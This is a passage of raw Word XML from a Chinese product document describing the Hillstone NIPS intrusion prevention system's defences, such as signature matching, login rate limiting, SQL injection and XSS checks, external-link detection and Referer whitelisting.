      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2791" w:rsidRPr="009655A2" w:rsidRDefault="00BD15D1" w:rsidP="00AA2791">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>因此，我们需要不断的优化完善我们的威胁检测和安全防御的手段和技术，应对愈发严峻的威胁攻击形势。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00725DEE">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc499884680"/>
      <w:r w:rsidRPr="009655A2">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>illstone</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:t>IPS</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>产品介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NIPS</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>下一代入侵检测系统</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是我司安全防护产品线中的一个闪亮的明星，在继承了防火墙的IPS功能基础上，加强了用户展示方面的功能，强大的报文分析和日志记录能更好的把威胁检测信息向用户展示，同时还支持了智能和沙箱等功能，大大加强了对未知威胁的检测和感知能力。NIPS</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>提供了从网络层分析到应用层分析、从应用识别到行为分析、从协议解析到业务语义分析的全方位检测，并采用了大量基于攻击原理的新型入侵检测/防御技术，确保抵御各类网络攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPS可广泛部署于政府、企业、高校、运营商等行业的互联网出口、服务器前端、内网隔离防护等应用场景。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00AA2791" w:rsidP="00856FBE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_Toc499884681"/>
      <w:r w:rsidR="00856FBE" w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NIPS单品安全防御功能</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="006019AE" w:rsidRDefault="00856FBE" w:rsidP="006019AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006019AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>威胁特征匹配检测：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPS的特征库包含</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8000+ 入侵攻击特征</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，采用基于协议合法性，通用特征和独立特征的多层检测机制，对协议字段和数据payload进行检查，支持HTTP、SMTP、IMAP、POP3、VOIP、NETBIOS等22种协议的特征匹配，其中http，telnet，ftp，smtp，DNS，pop3，msrpc，sunrpc8种协议可以做异常解析。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TCP的数据流经过TCP proxy进行重组和保序后，进入stream</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>engine，由各类decoder进行解析，解析出来的数据根据配置进行IPS特征匹配和相应的功能检测，根据检测出的结果执行记录日志或者重置阻断操作。UDP的数据不涉及乱序和分段，就直接由各类decoder进行解析后进行IPS的特征匹配。</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协议异常解析：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPS支持对http，telnet，ftp，smtp，DNS，pop3，msrpc，sunrpc8种协议可以做协议解析，对协议异常，特殊字段超出常规设置，暴力破解的行为等进行检测和拦截。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="006019AE" w:rsidRDefault="00856FBE" w:rsidP="006019AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006019AE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="006019AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>eb Server的防护功能：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="006019AE" w:rsidRDefault="00856FBE" w:rsidP="006019AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006019AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>高频访问控制：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>该功能就是单纯的限制对同一个站点的登录频率，以防止暴力破解用户密码。允许用户配置最多32条URL路径，每分钟对配置的</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行计数统计，达到配置的阈值之后立即阻断对应的IP地址的访问。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>针对每个高频</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，记录每个访问他的</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>地址的访问次数，将一分钟分未</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>份，每</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10s</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>份，统计</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10s</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>内的访问次数，如果当前时间以前的六份访问次数之和超过阈值，则会进行防护</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>120s</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>内没有被访问的</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>对应的历史访问的</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>信息会进行老化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="006019AE" w:rsidRDefault="00856FBE" w:rsidP="006019AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006019AE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="006019AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>注入检查</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>该功能采用的是通用化的</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sql injection</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的检测模型，即基于</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>语法进行分析检测，检查用户提交的参数中是否包含有</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>语句片段，检查点包括HTTP请求行</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>URI</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中的每一个参数，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>referer</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>首部中的每一个参数，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cookie/Cookie2</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中的每一个参数，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Post</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>提交的实体中的每一个参数。</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XSS注入检查</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>跨站攻击的本质是攻击者通过注入在客户端浏览器上可执行的脚本（</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>代码片段）实施攻击，服务器若对用户的出入没有做严格的过滤就将用户输入作为返回页面的一部分返回给浏览者，攻击就会得逞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注入检查就是检测用户提交的参数中是否包含</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的代码片段从而根据配置的动作进行拦截，也是一种基于</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>语法分析的通用检测手段。检查点包括HTTP请求行</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>URI</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中的每一个参数，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>referer</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>首部中的每一个参数，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cookie/Cookie2</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中的每一个参数，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Post</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>提交的实体中的每一个参数</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外链检查</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>该功能对web站点页面上引用的包含非本站点和白名单内的站点资源的情况进行检测和拦截，防止网站上被挂马。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>该功能的实现是通过HTML decoder对解析link标签，对link链接的站点与访问的站点以及白名单配置的站点地址进行比对，对不符合的信息根据配置的动作进行日志记录或者拦截。</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首部检查</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRPr="009655A2" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>针对盗链和</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击，设备提供了</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>首部过滤功能，开启该功能并配置</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>白名单后，在对指定站点进行访问时，设备会对</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>请求的</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>referer</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>头域内容进行解析，如果</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>referer</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中的域名既不匹配白名单也不是该站点本身，设备会依照配置的行为对访问进行限制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00856FBE" w:rsidRDefault="00856FBE" w:rsidP="00856FBE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>该功能的实现是通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http decoder</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http referer</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>头域进行解析，获取</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>referer</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中的域名信息。检查获取的</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>referer</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>域名是否在白名单内（完全匹配白名单的某一条配置，或者白名单的某一条配置为</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>referer</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>域名的后缀），如果是则放行，不是则进行下一项检查。比如，白名单中含</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">baidu.com, </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>则当</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>referer</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>域名为</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>baidu.com</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>www.baidu.com</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tieba.baidu.com</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>时能够匹配，但不能匹配</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>baidu.com.cn</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
